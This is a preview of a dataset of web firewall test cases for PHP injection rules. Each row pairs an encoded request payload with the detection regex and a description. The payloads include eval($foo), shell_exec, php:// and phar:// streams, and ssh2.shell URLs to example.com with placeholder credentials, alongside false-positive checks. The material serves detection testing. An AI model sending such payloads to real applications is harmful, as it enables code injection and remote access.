... | {
"rule_id": "933135",
"test_description": "$ {$a}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%7B%27_VAR%27.%27IABLE_NAME%27%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "$ {'_VAR'.'IABLE_NAME'}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7B%20%20%20%20%20%20%20%20%20%24a%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "$ { $a}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%20%20%20%20%7B%20%20%20CONSTANT%20%20%20%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "$ { CONSTANT }"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%7B%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "${}"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%20%7B%20%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "$ { }"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=%24%7Ba%7D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "\\$\\s*\\{\\s*\\S[^\\{\\}]*\\}",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
{
... | {
"rule_id": "933135",
"test_description": "${a}"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "var=php://stdout"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)php://(?:std(?:in|out|err)|(?:in|out)put|fd|memory|temp|filter)",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
... | {
"rule_id": "933140",
"test_description": "PHP Injection Attack: I/O Stream"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=phar://phpinfo.zip/phpinfo.txt"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (phar://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=compress.bzip2://file.bz2"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.bzip2://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=compress.zlib://http://www.example.com/some_file.gz"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (compress.zlib://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=zip://archive.zip"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (zip://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=lz77://some_file.lz"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Negative test: PHP Injection Attack - Non-existent wrapper scheme (lz77://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=ssh2.shell://user:password@example.com:22/xterm"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.shell://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=ssh2.exec://user:password@example.com:22/usr/local/bin/kubectl"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.exec://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=ssh2.tunnel://user:password@example.com:22/10.0.0.1:25"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.tunnel://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=ssh2.sftp://user:password@example.com:22/path/to/filename"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.sftp://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "file=ssh2.scp://user:password@example.com:22/path/to/filename"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?:bzip2|expect|glob|ogg|(?:ph|r)ar|ssh2(?:.(?:s(?:hell|(?:ft|c)p)|exec|tunnel))?|z(?:ip|lib))://",
"negated": false,
"type": "@rx"
},
"variables": [
{
"name": "REQUEST_COOKIES",
... | {
"rule_id": "933200",
"test_description": "Positive test: PHP Injection Attack - Wrapper scheme detected (ssh2.scp://)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "base64_deCOde"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "base64_decode mixed case"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=bzdecomprEss"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "bzdecompress"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=FOOcall_user_func"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "call_user_func"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=FOOfsockopen"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "fsockopen"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=FOOgzdecode"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "gzdecode"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=FOOGzInFlAtE"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "GzInFlAtE"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=FOOpHpInFo"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "pHpInFo mixed case"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "I%20don%27t%20like%20gzuncompress"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "gzuncompress"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": null
},
"malicious_payload": [
{
"location": "uri_params",
"value": "bar=pfsockopen%28%27foo%27%2C%2025%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "fsockopen"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "bar=posix_getpwuiD%28%27foo%27%2C%2025%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "posix_getpwuiD"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "Shell%5fexec=bla"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "shell_exec"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "ZlIb%5fDeCoDe=bla"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "ZlIb_DeCoDe"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "foo=get_defined_functions%28%29%5B0%5D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "get_defined_functions"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "foo=get_defined_vars%28%29%5B0%5D"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "get_defined_vars"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "foo=curl_iNit%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "PHP function call in body, mixed case.\npayload: curl_iNit()\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "posix_getegid%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "PHP function call in body\npayload: posix_getegid()\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "x=Print_r%28%20%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "PHP function call in body, mixed case\npayload: Print_r()\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "x=strrev%28%20%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "PHP function call in body.\npayload: strrev()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=the%20files%20%28yep%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: the files (yep)\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=exec%20%28"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test, exec should be followed by parenthesis\npayload: exec (\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=executor%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: executor()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=cheval%28%24foo%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: cheval($foo)\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=audi%6ffile%28%24foo%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: audiofile($foo)\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=the%20system%20is%20down%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: the system is down()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=ecosystem%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test\npayload: ecosystem()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=systems%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test, function doesn't exist\npayload: systems()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=system%20something%28%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False Positive test, function doesn't exist\npayload: system something()\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "a=preview"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "Snippets of English words (like `prev`) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "a=exploration"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "Snippets of English words (like `exp`) should not be matched, requiring regex match with word boundaries (e.g. 933160)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=file_ExistS%20%28%0A%0A%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "PHP mixed case function call with space, LF between ().\npayload: file_ExistS (\\n\\n)\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=RootAndLeafOpenCamera.jpg"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False positive with filename matching `fopen`\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=autodescription-site-settings[title_strip_tags]"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "SEO Framework false positive\nmatching 'strip_tags' in 'title_strip_tags'\n"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "test=SprintForTheCause"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "False positive with SprintForTheCause matching printf"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "test=printf(foo)"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "php-function-names-933150.data",
"negated": false,
"type": "@pmFromFile"
},
"variables": [
{
"name": "REQUEST_COOKIES",
"negated": false,
"part": ""
},
... | {
"rule_id": "933150",
"test_description": "Don't block printf function (Handled by 933160)"
} |
{
"attack_context": {
"location": [
"uri_params"
],
"method": "GET"
},
"malicious_payload": [
{
"location": "uri_params",
"value": "foo=chr%28123%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf... | {
"rule_id": "933160",
"test_description": "PHP function call in query.\npayload: chr(123)\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "eval($foo)"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf... | {
"rule_id": "933160",
"test_description": "PHP function call with variable as parameter.\npayload: eval($foo)\n"
} |
{
"attack_context": {
"location": [
"post_body"
],
"method": "POST"
},
"malicious_payload": [
{
"location": "post_body",
"value": "eval%0D%28%24foo%29"
}
]
} | {
"attack_type": [
"attack-injection-php"
],
"detection": {
"operator": {
"argument": "(?i)\\b\\(?[\\\"']*(?:assert(?:_options)?|c(?:hr|reate_function)|e(?:val|x(?:ec|p))|f(?:ile(?:group)?|open|puts)|glob|i(?:mage(?:gif|(?:jpe|pn)g|wbmp|xbm)|s_a)|m(?:d5|kdir)|o(?:pendir|rd)|p(?:assthru|open|r(?:intf... | {
"rule_id": "933160",
"test_description": "PHP function call, CR, ($variable).\npayload: eval\\r($foo)\n"
} |
End of preview.
No dataset card yet
- Downloads last month
- 5